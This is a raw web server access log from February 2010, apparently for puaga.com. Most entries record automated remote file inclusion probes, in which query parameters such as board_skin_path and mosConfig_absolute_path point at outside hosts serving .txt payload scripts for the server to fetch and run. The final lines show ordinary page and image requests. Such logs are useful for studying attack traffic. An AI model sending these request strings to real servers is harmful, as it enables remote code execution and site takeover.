85.12.33.30 - - [24/Feb/2010:10:10:43 -0800] "GET /logs/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:10:10:51 -0800] "GET /logs//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:10:10:51 -0800] "GET /components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:10:10:51 -0800] "GET /logs/access_100118.log//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:10:58 -0800] "GET /logs/access_100206.log%20%20/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:11:11 -0800] "GET /logs/access_100206.log%20%20/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:10:12:14 -0800] "GET /logs/access.log///?include_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:10:12:39 -0800] "GET /logs/access_100210.log///?include_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:10:12:47 -0800] "GET /logs/access.log///?include_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:10:13:13 -0800] "GET /logs/access_100210.log///?include_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:13:18 -0800] "GET /write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:13:29 -0800] "GET /write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:13:29 -0800] "GET /logs/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:13:29 -0800] "GET /logs/access_100203.log%20%20/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:13:46 -0800] "GET /logs/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:13:46 -0800] "GET /logs/access_100203.log%20%20/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:13:49 -0800] "GET /logs/access_100206.log%20%20/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:13:56 -0800] "GET /logs/access_100206.log%20%20/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:13:58 -0800] "GET /write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:13:58 -0800] "GET /logs/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:13:58 -0800] "GET /logs/access_100203.log%20%20/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:14:00 -0800] "GET /logs/access_100206.log%20%20/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:14:28 -0800] "GET /logs/access_100206.log%20%20/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:14:37 -0800] "GET /logs///delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:14:37 -0800] "GET //delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:14:37 -0800] "GET /logs/access_100120.log%20%20///delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:10:14:37 -0800] "GET /logs//board/bbs/board_tail.php?board_skin_path=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:10:14:37 -0800] "GET /board/bbs/board_tail.php?board_skin_path=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:14:45 -0800] "GET //delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:14:45 -0800] "GET /logs///delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:14:45 -0800] "GET /logs/access_100120.log%20%20///delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:15:05 -0800] "GET /logs/access_100121.log%20%20///delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [24/Feb/2010:10:15:50 -0800] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [24/Feb/2010:10:15:50 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [24/Feb/2010:10:15:50 -0800] "GET /logs/magazine.php?inc=http://www.thaz.de//jackz/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [24/Feb/2010:10:15:50 -0800] "GET /logs/access_100123.log/magazine.php?inc=http://www.thaz.de//jackz/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [24/Feb/2010:10:15:50 -0800] "GET /magazine.php?inc=http://www.thaz.de//jackz/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [24/Feb/2010:10:15:50 -0800] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [24/Feb/2010:10:16:31 -0800] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [24/Feb/2010:10:16:31 -0800] "GET /logs/access_100217.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [24/Feb/2010:10:16:32 -0800] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [24/Feb/2010:10:16:47 -0800] "GET /logs/access.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:10:16:51 -0800] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:10:16:51 -0800] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:10:16:51 -0800] "GET /logs/access_100217.log%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:10:16:54 -0800] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:10:16:54 -0800] "GET /logs/access_100217.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:10:16:54 -0800] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:10:17:05 -0800] "GET /logs/access.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:10:17:07 -0800] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:10:17:07 -0800] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:10:17:07 -0800] "GET /logs/access_100217.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:17:25 -0800] "GET /logs/access_100203.log/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:10:17:38 -0800] "GET /logs/access.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:17:54 -0800] "GET /logs/access_100206.log/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:10:17:54 -0800] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:10:17:54 -0800] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:10:17:54 -0800] "GET /logs/access_100217.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:10:17:56 -0800] "GET /logs/access.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:18:08 -0800] "GET /logs/access_100203.log/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:18:29 -0800] "GET /logs/access_100203.log/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:18:33 -0800] "GET /logs/access_100206.log/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:18:57 -0800] "GET /logs/access_100206.log/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:19:07 -0800] "GET /logs/access_100203.log/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:19:35 -0800] "GET /logs/access_100206.log/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:10:19:58 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:10:19:58 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:10:19:59 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:10:20:03 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:10:20:03 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:10:20:04 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:20:10 -0800] "GET /logs/access_100203.log/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:10:20:11 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:10:20:11 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:10:20:11 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:10:20:26 -0800] "GET /logs/access_100204.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:10:20:30 -0800] "GET /logs/access_100204.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:20:44 -0800] "GET /logs/access_100206.log/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:20:49 -0800] "GET /logs/access_100203.log/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [24/Feb/2010:10:20:55 -0800] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [24/Feb/2010:10:20:55 -0800] "GET /logs/access_100217.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [24/Feb/2010:10:20:56 -0800] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [24/Feb/2010:10:20:57 -0800] "GET /logs/access.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:21:17 -0800] "GET /logs/access_100206.log/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [24/Feb/2010:10:21:29 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [24/Feb/2010:10:21:29 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [24/Feb/2010:10:21:29 -0800] "GET /logs/access_100118.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:21:56 -0800] "GET / HTTP/1.1" 200 2392 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.pixero.net"
78.188.102.171 - - [24/Feb/2010:10:21:56 -0800] "GET /pnetsite/i/background.gif HTTP/1.1" 200 206161 "http://www.pixero.net/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.pixero.net"
83.103.72.130 - - [24/Feb/2010:10:22:02 -0800] "GET /logs/access_100119.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:22:03 -0800] "GET / HTTP/1.1" 200 2392 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.pixero.net"
78.188.102.171 - - [24/Feb/2010:10:22:03 -0800] "GET /pnetsite/i/main.png HTTP/1.1" 200 8564 "http://www.pixero.net/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.pixero.net"
218.38.243.44 - - [24/Feb/2010:10:22:17 -0800] "GET /logs/access_100129.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:10:22:17 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.0" 200 4931 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:10:22:17 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:10:22:27 -0800] "GET /logs/access_100121.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:10:22:48 -0800] "GET /logs///delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:10:22:48 -0800] "GET //delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:10:22:48 -0800] "GET /logs/access_100120.log%20%20///delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:10:23:07 -0800] "GET /logs/access_100121.log%20%20///delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:13 -0800] "GET / HTTP/1.1" 200 3642 "http://www.google.com/search?q=puaga&start=0&start=0&ie=utf-8&oe=utf-8&client=mozilla" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:13 -0800] "GET /style/pngHack.css HTTP/1.1" 200 42 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:13 -0800] "GET /style/imagehover.js HTTP/1.1" 200 1410 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:13 -0800] "GET /style/5.style.css HTTP/1.1" 200 2407 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:14 -0800] "GET /images/TL_Home_Hover.png HTTP/1.1" 200 5160 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:14 -0800] "GET /images/TL_AkifBar.png HTTP/1.1" 200 4614 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:14 -0800] "GET /images/TL_Home.png HTTP/1.1" 200 5012 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:14 -0800] "GET /images/TL_Diger.png HTTP/1.1" 200 4637 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:14 -0800] "GET /images/TL_AkifBar_Hover.png HTTP/1.1" 200 4767 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:14 -0800] "GET /images/TL_Diger_Hover.png HTTP/1.1" 200 4675 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:14 -0800] "GET /images/TL_Pixero_Hover.png HTTP/1.1" 200 4643 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:14 -0800] "GET /images/puaga.com_main.09482309483291.png HTTP/1.1" 200 154201 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:14 -0800] "GET /images/PuagaSubLink_38472394873298.png HTTP/1.1" 200 8153 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
